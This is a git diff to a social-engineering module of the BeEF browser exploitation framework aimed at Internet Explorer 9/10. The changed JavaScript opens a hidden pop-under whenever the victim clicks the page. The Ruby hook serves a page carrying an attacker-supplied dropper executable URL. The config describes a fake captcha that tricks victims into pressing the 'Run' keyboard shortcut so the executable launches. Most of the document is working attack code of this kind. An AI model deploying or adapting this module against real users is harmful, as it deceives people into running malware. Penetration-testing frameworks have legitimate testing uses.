diff --git a/modules/social_engineering/ui_abuse_ie/command.js b/modules/social_engineering/ui_abuse_ie/command.js
index 7147fcace..a62d8a2f9 100644
--- a/modules/social_engineering/ui_abuse_ie/command.js
+++ b/modules/social_engineering/ui_abuse_ie/command.js
@@ -7,7 +7,7 @@
beef.execute(function() {
if(beef.browser.isIE()){
- getLanguage = function(){
+ var getLanguage = function(){
var lang = null;
switch (beef.browser.getBrowserLanguage().substring(0,2)){
case "en":
@@ -20,7 +20,7 @@ beef.execute(function() {
return lang;
};
- grayOut = function(vis, options) {
+ var grayOut = function(vis, options) {
var options = options || {};
var zindex = options.zindex || 50;
var opacity = options.opacity || 70;
@@ -55,18 +55,21 @@ beef.execute(function() {
}
};
- spawnPopunder = function(){
- //TODO this will be replaced with a webpage served by BeEF
- var pu = window.open('popunder.html','','top=0, left=0,width=500,height=500');
+ function spawnPopunder(){
+ var url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/underpop.html'
+ var pu = window.open(url,'','top=0, left=0,width=500,height=500');
pu.blur();
- };
+ }
if(beef.browser.isIE9()){
// [TAB] + shortcut
- $(document.body).attr('onclick', 'spawnPopunder();');
+ document.body.onclick = function (){spawnPopunder();};
}else if(beef.browser.isIE10()){
// just shortcut
- $(document.body).attr('onclick', 'spawnPopunder();');
+ document.body.onclick = function (){spawnPopunder();};
+ //TODO using TAB+R works delivering this via BeEF, but it should work without Tab too.
+ // Probably there are some issues with the popunder focus and blur
+ //setTimeout(function (){spawnPopunder();}, 1000);
//TODO Using Gray-out, display the fake captcha with the 2 gifs (base64 the gif content and use dataURI inline image)
}else{
diff --git a/modules/social_engineering/ui_abuse_ie/config.yaml b/modules/social_engineering/ui_abuse_ie/config.yaml
index aea5b2ed3..f5781deea 100644
--- a/modules/social_engineering/ui_abuse_ie/config.yaml
+++ b/modules/social_engineering/ui_abuse_ie/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "User Interface Abuse (IE 9/10)"
- description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option 'Run'. Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
+ description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). You can mount an exe in BeEF as per extensions/social_engineering/droppers/readme.txt. The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option 'Run'. Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
authors: ["Rosario Valotta", "antisnatchor"]
target:
working: ["IE"]
diff --git a/modules/social_engineering/ui_abuse_ie/module.rb b/modules/social_engineering/ui_abuse_ie/module.rb
index 6fc52d4a1..8acce9332 100644
--- a/modules/social_engineering/ui_abuse_ie/module.rb
+++ b/modules/social_engineering/ui_abuse_ie/module.rb
@@ -12,11 +12,26 @@ class Ui_abuse_ie < BeEF::Core::Command
def self.options
return [
- {'name' => 'dropper_url', 'ui_label' => 'Executable URL (must be signed)', 'value' => 'http://dropper_url/dropper.exe'}
+ {'name' => 'exe_url', 'ui_label' => 'Executable URL (MUST be signed)', 'value' => 'http://beef_server:beef_port/yourdropper.exe'}
]
end
- #TODO pre-execute -> read popunder.html, replace placeholder, and serve it mounting a new URL
+ def pre_send
+ begin
+
+ @datastore.each do |input|
+ if input['name'] == "exe_url"
+ @exe_url = input['value']
+ end
+ end
+
+ popunder = File.read("#{$root_dir}/modules/social_engineering/ui_abuse_ie/popunder.html")
+ body = popunder.gsub("__URL_PLACEHOLDER__", @exe_url)
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html'}, body, "/underpop.html", -1)
+ rescue Exception => e
+ print_error "Something went wrong executing Ui_abuse_ie::pre_send, exception: #{e.message}"
+ end
+ end
def post_execute
content = {}
diff --git a/modules/social_engineering/ui_abuse_ie/templates/popunder.html b/modules/social_engineering/ui_abuse_ie/popunder.html
similarity index 66%
rename from modules/social_engineering/ui_abuse_ie/templates/popunder.html
rename to modules/social_engineering/ui_abuse_ie/popunder.html
index fc4319318..a558e815e 100644
--- a/modules/social_engineering/ui_abuse_ie/templates/popunder.html
+++ b/modules/social_engineering/ui_abuse_ie/popunder.html
@@ -5,9 +5,9 @@
-
+